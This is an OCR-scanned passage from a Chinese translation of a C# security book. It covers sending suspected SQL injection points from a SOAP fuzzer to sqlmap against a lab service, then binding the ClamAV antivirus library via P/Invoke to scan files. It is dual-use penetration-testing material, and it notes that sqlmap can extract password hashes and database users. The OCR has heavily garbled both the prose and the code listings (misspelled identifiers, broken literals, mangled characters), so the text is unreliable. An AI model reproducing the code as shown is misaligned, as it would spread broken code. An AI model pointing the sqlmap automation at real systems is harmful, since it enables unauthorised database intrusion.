清单 9-35: 在 第 3 章 SOAP 漏 洞 测 试 程序 的 FuzzSoapPort () 方法 中 增加 使 用 sqlmap 的 支持 


if (@resp.Contains("syntax error")) 
Console.@WritelLine("Possible SQL injection vector in parameter: " + 
type.Parameters[k|].Name); 
@TestPostRequestWithSqlmap( _ endpoint, soapDoc.ToString(), 
op.SoapAction, parm.ToString()); 
} 


在 最 初 的 SOAP 漏 洞 测试 程序 后 面 的 FuzzSoapPort () 方法 中 ， 我 们 测试 返回 的 响应 是 否 包含 报告 语法 错误 (syntax 
error) 的 错误 消息 @@。 如 果 存 在 语法 错误 ， 就 向 用 户 打印 输出 注入 向 量 @。 要 使 得 FuzzSoapPort () 方法 用 我 们 新 编写 的 方法 
来 调用 sqlmap 测 试 POST 请 求 ， 只 需要 在 原来 的 打印 输出 存在 漏洞 参数 的 WriteLine () 方法 后 面 增加 一 行 代码 即 可 。 通 过 增加 
一 行 调用 TestPostRequestWithsqlmap () 方法 @ 的 代码 ， 漏 洞 测 试 应 用 程序 即 可 向 sqlmap 目 动 提 人 交 可 能 人 存在 漏洞 的 请 求 用 
于 处 理 。 


同样 ， 更 新 if 语 句 里 面 的 FuzzHttpGetPort () 方法 ， 用 于 测试 HTTP 响 应 中 的 语法 错误 ， 如 清单 9-36 所 示 。 


清单 9-36: 为 来 自 SOAP 漏 洞 测试 应 用 程序 的 FuzzHttpGetPort () 方法 增加 sqlmap 支 持 


if (resp.Contains("syntax error")) 
{ 
Console.WriteLine("Possible SQL injection vector in parameter: "+ 
input.Parts[k].Name); 
TestGetRequestWithSqlmap(url, input.Parts[k].Name); 


} 


最 后 ， 如 清单 9-37 所 示 ， 更 新 FuzzHttpPostPort () 方法 中 用 于 验证 语法 错误 的 if 语 句 也 非常 简单 。 


清单 9-37: 为 来 和 目 SOAP 漏 洞 测试 应 用 程序 的 FuzzHttpPostPort () 方法 增加 sqlmap 文 持 


if (resp.Contains("syntax error")) 


Console.WritelLine("Possible SQOL injection vector in parameter: ”+ 
input.Parts[kj].Name ) ; 


TestPostRequestWithSqlmap(url, testParams, null, guid.ToString()); 
} 


在 给 SOAP 漏 洞 测试 程序 增加 了 这 些 代码 行 后 ， 现 在 不 仪 可 以 输出 可 能 存在 漏洞 的 参数 ， 而 且 还 可 以 输出 sqlmap 可 用 来 利 
用 这 些 漏洞 的 SQL 注入 技术 。 


在 1DE 环 境 或 者 终端 中 运行 更 新 后 的 SOAP 漏 洞 测试 应 用 程序 ， 将 得 到 一 些 有 关 sqlImap 的 新 信息 ， 这 些 信息 将 被 输出 到 屏幕 
上 1 如 清单 9-38 所 示 。 


清单 9-38: 对 存在 漏洞 的 SOAP 服 务 运行 更 新 后 的 SOAP 漏 洞 测试 程序 ， 这 个 程序 在 之 前 的 基础 上 增加 了 sqlmap 支 持 


$ mono ./ch9 automating sqlmap soap.exe http://172.18.20.40/Vulnerable.asmx 
Fetching the WSDL for service: http://172.18.20.40/Vulnerable.asmx 
Fetched and loaded the web service description. 
Fuzzing service: VulnerableService 
Fuzzing soap port: VulnerableServiceSoap 
Fuzzing operation: AddUser 
Possible SQL injection vector in parameter: username 
@ Testing url with sqlmap: http://172.18.20.40/Vulnerable.asmx 
--SNnip-- 


在 SOAP 漏 洞 测试 程序 输出 中 ， 注 意 天 于 用 sqlmap 对 URL 进 行 测试 的 那些 新 增 行 @。sqlmap 完 成 测试 SOAP 请 求 后 ， 就 将 
sqlmap 日 志 打 印 输出 到 屏幕 上 ， 使 用 户 可 看 到 输出 的 结果 


9.7 “本章 小 结 


本 章 介绍 了 如 何 将 sqlmap API 功 能 封 浴 成 易于 使 用 的 C# 类 ， 用 这 些 类 创建 小 应 用 程序 ， 根 据 参 数 传 入 的 URL 局 动 基本 的 
sqlmap 扫 描 。 在 创建 基本 的 sqlmap 应 用 程序 之 后 ， 我 们 为 第 3 章 的 SOAP 漏 洞 测试 应 用 程序 增加 了 sqlmap 支 持 ， 从 而 可 编写 一 
个 工具 ， 上 自动 利用 漏洞 ， 并 报告 可 能 存在 漏洞 的 HTTP 请 求 。 


sqlmap API 可 使 用 sqlmap 命 令 行 工具 能 使 用 的 所 有 参数 ， 也 区 是 况 sqlmapP APlI 功 能 如 果 不 比 命令 行 的 功能 更 为 强大 的 
话 ， 至 少 也 是 与 命令 行 功能 同等 强大 。 在 验证 给 定 URL 或 HTTP 请 求 确实 存在 漏洞 之 后 ， 利 用 sqlmap， 通 过 C# 技 巧 就 可 自动 检 
索 密码 的 散 列 值 以 及 数据 库 的 用 户 。 对 于 希望 像 黑 客 那 样 友 气 sqlmap 更 多 功能 的 入 侵 渗透 人 员 或 具有 安全 意识 的 开 友 人 员 来 
说， 这 里 介绍 的 功能 只 是 sqlmap 强 大 功能 的 一 些 皮 毛 。 我 们 希望 你 花 感 时 间 来 学 习 一 些 更 为 微妙 的 sqlmap 功 能 细节 ， 从 而 使 你 
的 安全 工作 变 得 更 为 灵活 。 


第 10 章 ” 目 动 化 运行 ClamAV 


ClamAV 是 一 个 开源 的 有 反 病 毒 解决 方案 ， 主 要 用 于 扫描 邮件 服务 器 上 的 邮件 和 附件 ， 在 恶意 病毒 侵入 并 感染 网 上 主机 之 前 将 
其 识别 出 来 ;但 这 绝 不 是 它 唯一 的 用 途 。 本 章 将 使 用 ClamAV 软 件 来 构建 一 个 目 动 化 病毒 扫描 器 ， 并 用 它 来 扫描 文件 检测 恶意 软 
件 ， 以 及 在 ClamAV 软 件数 据 库 的 帮助 下 识别 病毒 。 


本 章 介 绍 两 种 方式 来 自动 化 运行 ClamAV 软 件 : 第 一 种 是 与 支持 ClamAV 软 件 命令 行 工 具 (比如 我 们 所 熟悉 的 文件 扫 拉 器 
clamscan) 的 本 地 库 一 一 libclamav 库 进行 交互 ; 第 二 种 是 通过 套 接 字 与 clamd 守 护 进 程 进行 交互 ， 从 而 在 未 安装 ClamAV 软 件 
的 条 件 下 对 主机 进行 扫描 。 


10.1 安装 ClamAV 软 件 


ClamAV 软 件 使 用 C 语 言 编写 ， 这 就 为 使 用 C#i 语 言 上 自动 运行 增加 了 复杂 度 。ClamAV 软 件 在 Linux 系 统 上 可 以 使 用 通用 软件 
包 管 理 器 (比如 yum 和 apt) 进行 安装 ， 在 Windows 和 OS X 系 统 上 也 有 类 似 安装 工具 。 许 多 现代 Unix 系 统 发 行 版 中 包含 了 
ClamAV 软 件 安 六 包 ， 但 其 版 本 不 一 定 与 Mono 和 和 .NET 兼容 。 


在 Linux 系 统 上 安 沪 ClamAV 软 件 ， 应 使 用 如 下 命令 : 


$ sudo apt-get install clamav 


如 果 你 用 的 是 自 带 yum 工 具 的 Red Hat 系 统 或 基于 Fedora 的 Linux 系 统 ， 应 使 用 如 下 命令 进行 安装 : 


$ sudo yum install clamav clamav-scanner clamav-update 


如 果 为 了 使 用 yum 工 具 安 六 ClamAV 软 件 还 需要 开局 一 个 额外 的 储存 库 ， 那 么 你 可 以 使 用 如 下 命令 : 


$ sudo yum install -y epel-release 


这 些 命令 将 安 委 版 本 与 系统 架构 相 匹 配 的 ClamAV 软 件 。 


注意 : 除非 具有 相互 兼容 的 架构 ， 否 则 Mono 和 .NET 无 法 与 本 地 非 托 管 库 进 行 交互 。 比 如 ，32 位 的 Mono 和 .NET 无 法 与 64 位 


Linux 或 Windows 系 统 主机 上 编译 的 ClamAV 软 件 同步 运行 ; 你 需要 安装 或 编译 ClamAV 的 本 地 库 来 兼容 Monho 或 .NETI 的 32 位 架构 。 


软件 包 管 理 器 中 的 默认 ClamAV 软 件 安装 包 架 构 可 能 与 Mono/.NET 不 兼容 ; 如 果 是 这 样 ， 你 需要 专门 安装 一 下 ClamAV 软 
件 来 兼容 Mono/.NET 架 构 。 可 以 编写 一 个 程序 ， 通 过 检查 IntPtr.Size 的 值 来 确认 Mono/.NET 的 版 本 : 结果 等 于 4 代表 32 位 版 
本 ， 等 于 8 则 代表 64 位 版 本 。 如 果 Mono 或 者 Xamarin 运 行 在 Linux、OS X 或 者 Windows 系 统 上 ， 那 么 很 容易 检查 该 值 ， 具 体 命 
令 如 清单 10-1。 


清单 10-1: 检查 Mono/.NET 架 构 的 单行 代码 


$ echo "IntPtr.Size" | csharp 
4 


Mono 和 Xamarin 内 置 了 C# 语 言 的 交互 式 解 释 器 (名 为 csharp) ， 与 Python 语 言 的 解释 器 或 者 Ruby 语 言 的 irb 工 具 类 似 。 
通过 标准 输入 流 stdin 将 IntPtr.Size 回 送 到 解释 器 中 ， 就 可 以 打印 属性 Size 的 值 (本 例 中 结果 为 4， 代 表 32 位 架构 ) 。 如 果 你 的 结 
果 也 是 4， 那 么 就 需要 安装 32 位 的 ClamAV 软 件 。 最 简单 的 方法 可 能 是 创建 一 个 具有 目标 架构 的 虚拟 机 。 由 于 编译 ClamAV 软 件 
的 步骤 在 Linux、OS X 和 Windows 系 统 上 各 不 相同 ， 所 以 安 濠 32 位 的 ClamAV 软 件 并 不 在 本 书 范 围 之 内 (如 果 需 要 的 话 ) 介 
绍 ; 有 许多 在 线 教 程 可 以 指导 你 在 自己 的 操作 系统 上 完成 安装 步 又。 


也 可 以 使 用 Unix 系 统 上 的 file 工 具 来 检查 ClamAV 软 件 库 是 32 位 还 是 64 位 版 本 ， 具 体 命令 如 清单 10-2 所 示 。 


清单 10-2: 使 用 file 工 具 查 看 libclamav 架 构 


$ file /usr/lib/x86 64-linux-gnu/libclamav.so.7.1.1 
libclamav.so.7.1.1: ELF @64-bit LSB shared object, x86-64, version 1 (GNU/Linux), 
dynamically linked, not stripped 


使 用 file 工 具 可 以 查看 libclamav 库 是 在 32 位 还 是 64 位 架构 下 编译 生成 的 。 在 我 的 主机 上 ， 清 单 10-2 执 行 结果 显 示 libclamav 
库 是 64 位 版 本 @。 但 在 清单 10-1 中 ，IntPtr.Size 的 返回 值 等 于 4， 而 不 等 于 8! 这 意味 着 ,我 的 libclamav (64 位 ) 和 Mono (32 
位 ) 架构 不 兼容 ; 我 必须 做 出 选择 ， 要 么 为 了 在 Mono 安 装 环境 下 使 用 ClamAV 软 件 而 将 其 重新 编译 为 32 位 版 本 ， 要 么 安装 64 位 
的 Mono 运 行 时 环境 。 


10.2 “ClamAV 软 件 本 地 库 与 camd 网 络 守护 进程 


我 们 将 从 使 用 本 地 libclamav 库 开始 来 学 习 自 动 运行 ClamAV 软 件 。 可 以 使 用 ClamAV 软 件 的 本 地 副本 及 其 签名 来 实现 病毒 
扫 摘 ; 然而 ， 这 要 求 ClamAV 软 件 和 签名 在 系统 或 设备 上 正确 安 六 与 更 新 。 在 肥 病 毒 签名 耗 尽 磁盘 空间 的 情况 下 ，3 引 | 苟 将 大 量 占 
用 主机 的 内 存 和 CPU 资源 ;有 时 这 些 需求 会 超出 程序 员 预 期 而 占用 主机 更 多 的 资源 ， 因 此 有 必要 将 扫 摘 工作 转移 到 另 一 全 主机 


你 可 能 更 倾向 于 在 中 央 节 点 实现 反 病 毒 扫 换 (或 许 是 邮件 服务 器 收 友 邮 件 时 ) ， 在 这 种 情况 下 ， 不 太 容 易 使 用 libclamav 
库 。 作 为 著 代 方案 ， 可 以 使 用 clamd 守 护 进 程 来 将 反 病 毒 扫 摘 工作 从 邮件 服务 器 转移 到 专用 病毒 扫描 服务 器 上 。 只 需要 保证 一 台 
服务 器 的 反 病 毒 签 名 最 新 ， 并 且 不 用 承担 邮件 服务 器 宕 机 的 巨大 风险 。 


10.3 ”通过 ClamAV 软 件 本 地 库 自动 执行 


一 旦 ClamAV 软 件 正 确 安 六 并 运行 ， 你 就 可 以 着 手 自 动 运行 的 工作 了 。 首 先 ， 我 们 将 直接 使 用 libclamav 库 中 的 
P/Invoke (第 1 章 中 所 介绍 的 技术 ) 来 目 动 运行 ClamAV 软 件 ， 这 种 方法 允许 托管 程序 集 调 用 本 地 非 托管 库 中 的 阔 数 。 尽 管 需要 
实现 几 个 支持 类 ,但 将 ClamAV 软 件 整合 到 你 目 己 的 应 用 程序 之 中 是 一 种 相对 简单 而 综合 的 方法 。 


10.3.1 创建 支持 的 榴 举 类 型 和 类 


在 代码 中 我 们 需要 一 些 辅助 的 类 和 枚 举 类 型 。 所 有 的 辅助 类 都 很 简单 一 一 大 部 分 不 超过 10 行 代码 ; 然而 ， 它 们 起 到 了 烙 合 


剂 的 作用 ， 将 方法 与 类 整合 为 一 体 。 


文 持 的 枚 举 类 型 
清单 10-3 中 所 示 的 ClamDatabaseOptions 枚 举 类 型 ， 在 ClamAV 软 件 引擎 中 用 于 为 我 们 将 用 到 的 病毒 查询 库 设 置 选项 。 
清单 10-3: 定义 ClamAV 软 件数 据 库 选 项 的 ClamDatabaseOptions 枚 举 类 型 


[Flags | 
public enum ClamDatabaseOptions 


{ 
CL DB PHISHING = Ox2, 


CL DB PHISHING URLS = Ox8, 
CL DB BYTECODE = 0x2000， 
@CL DB STDOPT = (CL DB PHISHING | CL DB PHISHING URLS | CL DB BYTECODE), 


} 


ClamDatabaseOptions 枚 举 类 型 用 到 的 某 些 值 ， 直 接 来 自 与 数据 库 选 项 相关 的 ClamAV 软 件 C 语 言 源 代 码 。 这 三 个 选项 开 
启 了 钓鱼 邮件 和 仿冒 URL 地 址 的 签名 以 及 用 于 启发 式 扫 摘 的 动态 字 市 码 签 名 。 三 者 组 合 构成 了 ClamAV 软 件 用 来 扫 摘 病毒 或 有 
总 软件 的 标准 数据 库 选 项 。 通 过 使 用 位 操作 符 OR 来 组 合 三 个 选项 值 ， 我 们 将 得 到 组 合 选 项 的 一 个 位 掩 码 ， 这 个 组 合 选 项 定义 于 
一 个 枚 举 类 型 成 员 @ 并 且 之 后 将 被 用 到 。 使 用 位 掩 码 是 用 来 高 效 存储 标志 或 选项 的 弟 用 方式 。 


另 一 个 我 们 必须 实现 的 枚 举 类 型 是 ClamReturnCode， 它 对 应 于 ClamAV 软 件 已 知 的 返回 码 ， 如 清单 10-4 所 示 ; 这 些 值 也 
直接 来 源 于 ClamAV 软 件 的 源 代码 。 


清单 10-4: 用 于 存放 我 们 感 兴趣 的 ClamAV 软 件 返 回 值 的 枚 举 类 型 


public enum ClamReturnCode 


{ 
@CL CLEAN = 0x0， 


@CL SUCCESS = 0x0， 
@CL VIRUS = Ox1 


} 


这 绝对 不 是 返回 值 的 完整 列表 ， 我 只 列 出 了 在 将 要 编写 的 例子 中 想 要 见 到 的 返回 值 ， 其 中 包括 : 无 甫 代码 @ 和 成 功 代码 @ 
一 一 代表 一 个 被 扫描 的 文件 无 病毒 或 者 某 一 操作 成 功 ， 以 及 相应 的 病毒 代码 @ 一 一 汇报 在 被 扫描 的 文件 中 友 现 病毒 。 如 果 磁 到 
了 ClamReturnCode 枚 举 类 型 中 未 定义 的 任何 错误 代码 ， 可 以 在 ClamAV 软 件 的 源 文 件 clamav.h 中 查询 ;这些 代码 定义 于 头 文 
件 的 cl|_error t 结 构 体 中 。 


ClamReturnCode 枚 举 类 型 中 有 三 个 值 ， 但 其 中 只 有 两 个 是 不 同 的 ; CL_ CLEAN 和 CL SUCCESS 共享 相同 的 值 0x0， 因 此 
0x0 既 代表 一 切 如 期 运行 ， 又 代表 被 扫 拉 文件 无 害 。 当 检测 到 病毒 时 ， 将 返回 另 一 个 值 0x1。 


我 们 需要 定义 的 最 后 一 个 榴 举 类 型 是 ClamScanOptions， 也 是 所 需 的 最 复杂 的 一 个 枚 举 类 型 ， 如 清单 10-5 所 示 。 
清单 10-5: 包含 ClamAV 软 件 扫描 选项 的 类 型 


[Flags | 
public enum ClamScanOptions 
{ 
CL SCAN ARCHIVE = Ox1, 
CL SCAN MAIL = Ox2, 
CL SCAN OLE2 = Ox4, 
CL SCAN HTML = Ox10, 
@CL SCAN PE = Ox20, 
CL SCAN ALGORITHMIC = Ox200, 
@CL SCAN ELF = Ox2000, 
CL SCAN PDF = Ox4000, 
@CL SCAN STDOPT = (CL SCAN ARCHIVE | CL SCAN MAIL | 
CL SCAN OLE2 | CL SCAN PDF | CL SCAN HTML | CL SCAN PE | 
CL SCAN ALGORITHMIC | CL SCAN ELF) 


} 


如 你 所 见 ，ClamScanOptions 看 起 来 像 ClamDatabaseOptions 的 复杂 版 本 ; 它 定义 了 可 扫描 的 多 种 文件 类 型 (Windows 
系统 的 PE 可 执行 文件 @@，Unix 系 统 的 ELF 可 执行 文件 @，PDF 文 件 ， 等 等 ) ， 以 及 一 组 标准 选项 @。 和 之 前 的 枚 举 类 型 一 样 ， 这 
些 枚 举 值 也 是 直接 来 自 ClamAV 软 件 的 源 代 码 。 


支持 类 ClamResult 
现在 我 们 只 需 实现 ClamResult 类 来 完成 所 需 的 支持 项 ， 进 而 驱动 libclamav 库 ， 如 清单 10-6 所 示 。 


清单 10-6: 包含 ClamAV 软 件 扫描 结果 的 类 型 


public class ClamResult 


{ 
public @ClamReturnCode ReturnCode { get; set; } 


public string VirusName { get; set; } 
public string FullPath { get; set; } 
} 


这 个 类 非常 简单 ! 第 一 个 属性 ClamReturnCode@ 和 存储 了 扫 摘 的 返回 代码 ( 通 弟 是 CL VIRUS) ; 还 有 两 个 字符 串 属 性 : 一 
个 用 于 存放 ClamAV 软 件 汇 报 的 病毒 名 称 ， 另 一 个 用 于 存放 文件 路 径 (如 果 之 后 需要 的 话 ) 。 通 过 使 用 该 类 ， 我 们 可 以 将 每 次 文 
件 扫 摘 的 结果 仓储 为 一 个 对 象 。 


10.3.2 ”调用 ClamAV 软 件 的 本 地 库 函 数 


为 了 把 我 们 从 libclamav 库 中 访问 到 的 本 地 浮 数 与 工程 其 他 部 分 的 C# 语 言 代 码 和 类 隅 离开 来 ， 我 们 定义 了 一 个 单独 的 类 来 包 
含 所 有 将 用 到 的 ClamAV 软 件 函 数 (如 清单 10-7 所 示 ) 。 


清单 10-7: 包含 所 有 的 ClamAV 软 件 函 数 的 ClamBindings 类 


static class ClamBindings 


人 
const string @ clamLibPath = /Users/bperTry/cLamav/1Libclamav/ .1ibs/Libclamav.7.dylib ; 


[@DllImport( clamLibPath)] 
public extern static @ClamReturnCode cl init(uint options); 


[DllImport( clamLibPath)] 
public extern static IntPtr cl] engine new(); 


[DllIimport( clamLibPath)] 
public extern static ClamReturnCode cl engine free(IntPtr engine); 


[DllIimport( clamLibPath)| 
public extern static IntPtr cl retdbdir(); 


[DllIimport( clamLibPath)] 
public extern static ClamReturnCode cl load(string path, IntPtr engine, 
ref uint signo, uint options); 


[DllImport( clamLibPath)] 
public extern static ClamReturnCode cl scanfile(string path, ref IntPtr virusName, 
ref ulong scanned, IntPtr engine, uint options); 


[DllIimport( clamLibPath)] 
public extern static ClamReturnCode cl engine compile(IntPtr engine); 


ClamBindings 类 首先 定义 了 一 个 字符 串 类 型 的 变量 ， 并 赋值 为 将 要 交互 的 ClamAV 软 件 库 的 全 路 径 @; 在 本 例 中 ， 它 指 疝 
一 个 OS X 系 统 中 的 .dylib 文 件 ， 该 文件 是 我 为 了 匹配 Mono 安 妆 环 境 的 以 构 而 使 用 源码 编译 得 到 的 。 根 据 编译 或 安 半 ClamAV 软 
件 的 方式 ，ClamAV 软 件 本 地 库 的 路 径 在 你 的 系统 上 可 能 会 有 所 不 同 : 在 Windows 系 统 上 ， 如 果 使 用 ClamAV 软 件 安 六 程序 进行 
安装 ， 库 文件 将 是 /Program Files” 文 件 夹 下 的 一 个 .dl 文件 ; 在 OS X 系 统 上 它 可 能 是 一 个 .dylib 文 件 ， 而 在 Linux 系 统 上 则 可 
能 是 一 个 .so 文件 。 在 较 新 的 系统 上 ， 可 以 使 用 find 工 具 来 定位 正确 的 库 文件 。 


在 Linux 系 统 上 ， 以 下 命令 可 用 于 打印 任意 libclamav 库 文件 的 路 径 : 


$ find / -name libclamav*so$ 


在 OS X 系 统 上 ， 则 使 用 如 下 命令 : 


$ find / -name libclamav*dylib$ 


DlllImport 属 性 @ 通 知 Mono/.NET 运 行 时 环境 ， 在 我 们 用 参数 所 指定 的 库 中 查找 给 定 的 辫 数 。 以 这 种 方式 ， 束 可 以 在 我 们 自 
己 的 程序 中 直接 调用 ClamAV 软 件 函 数 。 接 下 来 实现 ClamEngine 类 时 ， 将 介绍 清单 10-7 中 的 函数 。 还 可 以 看 到 ， 我 们 已 经 用 到 
了 CIlamReturnCode 类 @， 当 一 些 ClamAV 软 件 的 本 地 函数 被 调用 时 将 返回 该 类 型 的 值 。 


在 女 
等 


10.3.3 ”编译 ClamAV 软 件 5 


清单 10-8 中 的 ClamEngine 类 将 完成 大 部 分 的 实际 工作 ， 包 括 扫 朱 和 报告 潜在 的 恶意 文件 。 
清单 10-8: 对 文件 进行 扫 摘 和 报告 的 ClamEngine 类 


public class ClamEngine : IDisposable 
private @IntPptr engine; 
public @ClamEngine() 
ClamReturnCode ret = ClamBindings.@c] init((uint)ClamDatabaseOptions.CL DB STDOPT); 


if (ret != ClamReturnCode.CL SUCCESS) 
throw new Exception("Expected CL SUCCESS, got ”+ ret); 


engine = ClamBindings.@cl engine new(); 
try 
{ 
string @dbDir = Marshal.PtrToStringAnsi(ClamBindings.c] retdbdir()); 


uint @signatureCount = 0; 


ret = ClamBindings.@c] load(dbDir, engine, ref signatureCount, 


(uint)ClamScanOptions.CL SCAN STDOPT); 


if (ret != ClamReturnCode.CL SUCCESS) 
throw new Exception("Expected CL SUCCESS, got " + ret); 


ret = (ClamReturnCode)ClamBindings.@c] engine compile(engine); 


if (ret != ClamReturnCode.CL SUCCESS) 
throw new Exception("Expected CL SUCCESS, got ”+ ret); 
} 


catch 


ret = ClamBindings.cl_ engine free(engine); 


if (ret != ClamReturnCode.CL SUCCESS) 
Console.Error.WritelLine("Freeing allocated engine failed"); 


throw; 


} 
} 
} 


首先 ， 我 们 声明 一 个 名 为 engine 的 IntPtr 类 级 别 变 量 @， 该 变量 指向 我 们 的 ClamAV 软 件 引 擎 ， 供 类 内 的 其 他 万 法 使 用 。 尽 
省 C# 语 言 并 不 需要 一 个 指针 来 引用 一 个 对 象 在 内 存 中 的 精确 地 址 ， 但 是 C 语 言 需 要 ; 《语言 有 intptr_t 数 据 类 型 的 指针 ， 而 IntPtr 
是 C 语 言 指针 的 C# 语 言 版 本 。 因 为 ClamAV 软 件 引 掌 要 在 .NET 平 台 和 C 语 言 之 间 来 回 传递 ， 所 以 当 我 们 将 其 传递 给 C 语 言 的 时 
候 ， 需 要 一 个 指针 来 指向 其 在 内 存 中 存储 的 地 址 。 这 就 是 创建 engine 变 量 时 所 发 生 的 事情 ， 我 们 将 在 构造 器 中 为 engine 变 量 赋 


值 。 


之 后 ， 我 们 定义 构造 器 。ClamEngine 类 的 构造 器 @ 不 需要 任何 参数 。 为 了 初始 化 ClamAV 软 件 来 分 配 扫 描 所 需 的 引擎 ， 加 
载 签名 时 通过 传递 我 们 想 要 使 用 的 签名 数据 库 选 项 ， 来 调用 ClamBindings 类 中 的 c|_init () 函数 @@。 为 了 防止 ClamAV 软 件 未 能 
成 功 初 始 化 ， 我 们 检查 cl_init () 函数 的 返回 值 ， 并 在 初始 化 进程 失败 的 情况 下 抛 出 异 囊 ; 如 果 ClamAV 软 件 初 始 化 成 功 ， 则 我 
们 通过 cl| engine_new () 冰 数 @ 来 分 配 一 个 新 的 引擎 ， 该 阔 数 无 须 参数 并 返回 一 个 指向 新 的 ClamAV 软 件 引 警 的 指针 ， 我 们 将 
该 指针 存 入 engine 变 量 中 以 便 后 续 使 用 。 


一 旦 拥有 了 一 个 分 配 的 引 掌 ， 那 么 我 们 就 需要 加 载 扫描 所 需 的 有 反 病 毒 签名 。cl_retdbdir () 函数 返回 ClamAV 软 件 配置 使 用 
的 定义 数据 库 的 路 径 ， 我 们 将 该 路 径 存 入 dbDir 变 量 @ 中 。 因 为 cl retdbdir () 函数 返回 一 个 C 语 言 字符 串 指针 ， 所 以 需要 使 用 
Marshal 类 (一 个 用 于 将 数据 类 型 从 托管 类 型 转换 为 非 托管 类 型 ， 或 者 反方 向 转换 的 类 ) 中 的 PtrTostringAnsi () 函数 来 将 其 
转换 为 普通 字符 串 。 在 储存 数据 库 路 径 之 后 ， 我 们 定义 一 个 整 型 变量 signatrueCount@， 将 其 传递 给 c| load () 函数 并 用 从 数 
据 库 加 载 的 签名 数量 来 为 其 赋值 。 


使 用 ClamBindings 类 中 的 cl_load () 立 数 来 为 引擎 加 载 签名 数据 库 。 我 们 将 ClamAV 软 件数 据 库 目录 dbDir， 新 的 引擎 
engine， 以 及 其 他 一 些 值 作为 参数 ， 传 递 给 该 冰 数 。 传 递 给 cl_load () 函数 的 最 后 一 个 变量 是 对 应 于 我 们 想 要 支持 扫描 的 文件 
类 型 (比如 HTML、PDF， 或 者 其 他 特定 类 型 的 文件 ) 的 一 个 枚 举 值 。 我 们 使 用 之 前 所 创建 的 类 型 ClamScanOptions， 来 将 我 
们 的 扫描 选项 定义 为 CL SCAN_STDOPT， 因 而 我 们 使 用 标准 扫描 选项 。 在 加 载 病 毒 数据 库 (根据 选项 的 不 同 ， 这 个 过 程 可 能 需 
要 几 秒 才能 完成 ) 之 后 ， 再 次 检查 返回 值 是否 等 于 CL SUCCESS; 若 相 等 ， 最 终 将 其 传递 给 c| engine_compile () 函数 @ 来 编 
译 引擎 ， 这 个 过 程 将 准备 引擎 以 开始 扫描 文件 。 之 后 最 后 一 次 检查 是 否 收 到 返回 值 CL_SUCCESs。 


10.3.4 扫 摘 文件 


为 了 快速 扫描 文件 ， 我 们 将 用 名 为 “ScanFile () ”的 方法 来 封装 cl scanfile () 国 数 (ClamAV 软 件 库 国 数 ， 用 于 扫 摘 文 
件 并 汇报 结果 ) 。 我 们 可 以 准备 需要 传递 给 cl scanfile () 为数 的 参数 ， 以 及 将 ClamAV 软 件 的 返回 结果 作为 一 个 ClamResult 对 
象 处 理 并 返回 。 有 具体 代码 如 清单 10-9 所 示 。 


清单 10-9: ScanFile () 方法 用 于 扫描 并 返回 一 个 ClamResult 对 象 


public ClamResult ScanFile(string filepath, uint options = (uint)ClamScanOptions.@CL SCAN STDOPT) 
L 


@ulong scanned = 0; 
四 IntpPtr vname = (IntPtr)null; 
ClamReturnCode ret = ClamBindings.@c] scanfile(filepath, ref vname, ref scanned, 
engine, options); 


if (ret == ClamReturnCode.CL VIRUS) 
{ 


string virus = Marshal.®@PtrToStringAnsi(vname); 


@ClamResult result = new ClamResult(); 
result.ReturnCode = ret; 
result.VirusName = virus,; 
result.FullPpath = filepath; 


return result; 


else if (ret == ClamReturnCode.CL CLEAN) 
return new ClamResult() { ReturnCode = ret, FullPath = filepath }; 
else 
throw new Exception("Expected either CL CLEAN or CL VIRUS, got: ”+ ret); 


我 们 所 实现 的 ScanFile () 方法 需要 两 个 参数 ， 但 我 们 只 需要 使 用 第 一 个 ， 即 竺 扫描 文 件 的 路 径 ; 用 户 可 以 使 用 第 二 个 参数 
来 定义 扫 摘 选 项 ， 但 如 果 第 二 个 参数 未 包 捐 定 ， 则 该 方法 将 使 用 定义 于 ClamscanOptions 的 标准 扫 摘 选 项 @ 来 扫 摘 文件 。 


在 ScanFile () 方法 的 开头 先 定 义 几 个 将 要 用 到 的 变量 : 第 一 个 变量 是 ulong (无 符号 长 整 型 ) 类 型 的 变量 scanned 被 谍 始 
化 为 0@)， 实 际 上 在 扫描 文件 之 后 我 们 并 未 使 用 该 变量 ,但 cl_scanfile () 函数 需要 它 才 能 正确 调用 ; 第 二 个 变量 是 IntPtr 类 型 
的 ,我 们 将 其 命名 为 vname ( 即 病 毒 名 称 ) @ 并 初始 化 为 null， 而 一 旦 发 现 一 个 病毒 ， 将 用 一 个 C 语 言 字符 串 指 针 为 其 赋值 ， 该 
指针 指向 ClamAV 软 件数 据 库 中 的 病毒 名 称 。 


使 用 定义 于 ClamBindings 类 中 的 cl_scanfile () 函数 @ 来 扫 摘 文件 ， 并 为 该 国 数 传递 一 组 参数 。 第 一 个 参数 是 竺 扫 摘 的 文 
件 路 径 ， 随 后 是 将 被 赋值 为 检测 到 的 病毒 名 称 (如 果 检 测 到 病毒 ) 的 变量 。 最 后 两 个 参数 是 用 于 扫 摘 的 引 称 和 用 于 实现 病毒 扫 摘 
的 扫描 选项 。 中 间 的 参数 scanned 锐 用 于 调用 cl_scanfile () 函数 ， 但 对 我 们 来 说 是 无 用 的 ; 在 将 其 作为 参数 传递 给 图 数 之 后 ， 
我 们 不 会 再 用 到 它 。 


方法 的 剩余 部 分 将 扫 拉 信息 很 好 地 打包 以 便 程 序 员 能 够 使 用 。 如 果 c|_scanfile () 阔 数 的 返回 值 表明 友 现 病毒 ， 那 么 我 们 
就 使 用 PtrToStringAnsi () 消 数 来 返回 vname 变 量 所 指向 的 内 存 中 的 字符 串 。 一 旦 获取 了 病毒 名 称 ， 我 们 束 创 建 一 个 新 的 
ClamResult 类 @， 并 使 用 cl_scanfile () 返回 值 、 病 毒 名 称 ， 以 及 扫 摘 文件 的 路 径 来 为 它 的 三 个 属性 赋值 。 之 后 ， 将 
ClamResult 类 返回 给 调用 者 。 如 果 返 回 值 为 CLCLEAN， 则 返回 一 个 返回 值 为 CL_CLEAN 的 新 ClamResult 类 。 然 而 ， 如 果 返 回 


值 既 不 等 于 CL_ CLEAN 也 不 等 于 CL_ VIRUS， 则 抛 出 一 个 异常 ， 因 为 得 到 了 一 个 未 预期 的 返回 值 。 


10.3.5 ”清理 收尾 


clamEngine 类 中 剩 下 最 后 一 个 待 实现 的 方法 是 Dispose () ， 如 清单 10-10 所 示 ， 该 方法 在 using 语 句 环境 下 会 在 一 次 扫 摘 
之 后 自动 清理 ， 并 且 该 方法 是 IDisposable 接 口 所 需 的 。 


清单 10-10: Dispose () 方法 ， 用 于 自动 清理 引擎 


public void Dispose() 
{ 


ClamReturnCode ret = ClamBindings.@c] engine free(engine); 


if (ret != ClamReturnCode.CL SUCCESS) 
